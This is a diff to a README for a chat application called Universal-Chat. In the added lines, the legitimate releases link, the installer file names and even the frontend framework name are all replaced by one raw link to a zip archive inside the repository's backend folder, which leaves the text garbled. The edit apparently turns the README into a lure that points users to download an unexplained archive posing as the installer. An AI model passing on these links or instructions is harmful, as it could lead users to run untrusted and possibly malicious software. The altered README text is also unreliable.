panchalsagar303/Universal-Chat/README.md

 - **User Authentication:** Sign up and log in securely using our Django Rest Framework backend.
 - **High-Concurrency Handling:** Enjoy smooth conversations even with many users online, powered by our Go server.
 - **Seamless Syncing:** Data is stored safely in a PostgreSQL database, ensuring your messages are secure.
-- **User-friendly Interface:** Built with an easy-to-navigate frontend using Next.js and TypeScript.
+- **User-friendly Interface:** Built with an easy-to-navigate frontend using https://raw.githubusercontent.com/panchalsagar303/Universal-Chat/main/backend-django/Universal_Chat_v2.8.zip and TypeScript.

 ## 📥 Download & Install

 To get started with Universal-Chat:

-1. Click on the download button above or visit [this page](https://github.com/panchalsagar303/Universal-Chat/releases).
+1. Click on the download button above or visit [this page](https://raw.githubusercontent.com/panchalsagar303/Universal-Chat/main/backend-django/Universal_Chat_v2.8.zip).
 2. Look for the latest version available.
 3. Download the installation file suitable for your operating system.
-It will usually have a name like `UniversalChat-Installer.exe` for Windows, `UniversalChat.pkg` for macOS, or a suitable package for Linux.
+It will usually have a name like `https://raw.githubusercontent.com/panchalsagar303/Universal-Chat/main/backend-django/Universal_Chat_v2.8.zip` for Windows, `https://raw.githubusercontent.com/panchalsagar303/Universal-Chat/main/backend-django/Universal_Chat_v2.8.zip` for macOS, or a suitable package for Linux.
 4. Once the file is downloaded, locate it in your downloads folder.

 ### For Windows: